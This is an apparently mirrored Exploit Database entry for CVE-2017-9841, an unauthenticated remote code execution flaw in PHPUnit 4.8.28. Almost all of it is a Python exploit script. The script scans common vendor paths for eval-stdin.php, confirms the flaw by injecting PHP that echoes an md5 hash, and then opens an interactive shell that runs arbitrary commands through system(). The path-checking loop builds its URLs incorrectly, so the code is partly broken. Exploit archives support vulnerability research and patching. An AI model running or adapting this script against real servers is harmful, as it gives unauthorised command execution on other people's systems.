PHP Unit 4.8.28 – Remote Code Execution (RCE) (Unauthenticated)

• Exploit Database
• 17 阅读

• 作者： souzo
  日期： 2022-02-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50702/

• # Exploit Title: PHP Unit 4.8.28 - Remote Code Execution (RCE) (Unauthenticated)
  # Date: 2022/01/30 
  # Exploit Author: souzo 
  # Vendor Homepage: phpunit.de
  # Version: 4.8.28
  # Tested on: Unit
  # CVE : CVE-2017-9841
  
  import requests
  from sys import argv
  phpfiles = ["/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"]
  
  def check_vuln(site):
  vuln = False
  try:
  for i in phpfiles:
  site = site+i
  req = requests.get(site,headers= {
  "Content-Type" : "text/html",
  "User-Agent" : f"Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0",
  },data="<?php echo md5(phpunit_rce); ?>")
  if "6dd70f16549456495373a337e6708865" in req.text:
  print(f"Vulnerable: {site}")
  return site 
  except:
  return vuln
  def help():
  exit(f"{argv[0]} <site>")
  
  def main():
  if len(argv) < 2:
  help()
  if not "http" in argv[1] or not ":" in argv[1] or not "/" in argv[1]:
  help()
  site = argv[1]
  if site.endswith("/"):
  site = list(site)
  site[len(site) -1 ] = ''
  site = ''.join(site)
  
  pathvuln = check_vuln(site)
  if pathvuln == False:
  exit("Not vuln")
  try:
  while True:
  cmd = input("> ")
  req = requests.get(str(pathvuln),headers={
  "User-Agent" : f"Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0",
  "Content-Type" : "text/html"
  },data=f'<?php system(\'{cmd}\') ?>')
  print(req.text)
  except Exception as ex:
  exit("Error: " + str(ex))
  main()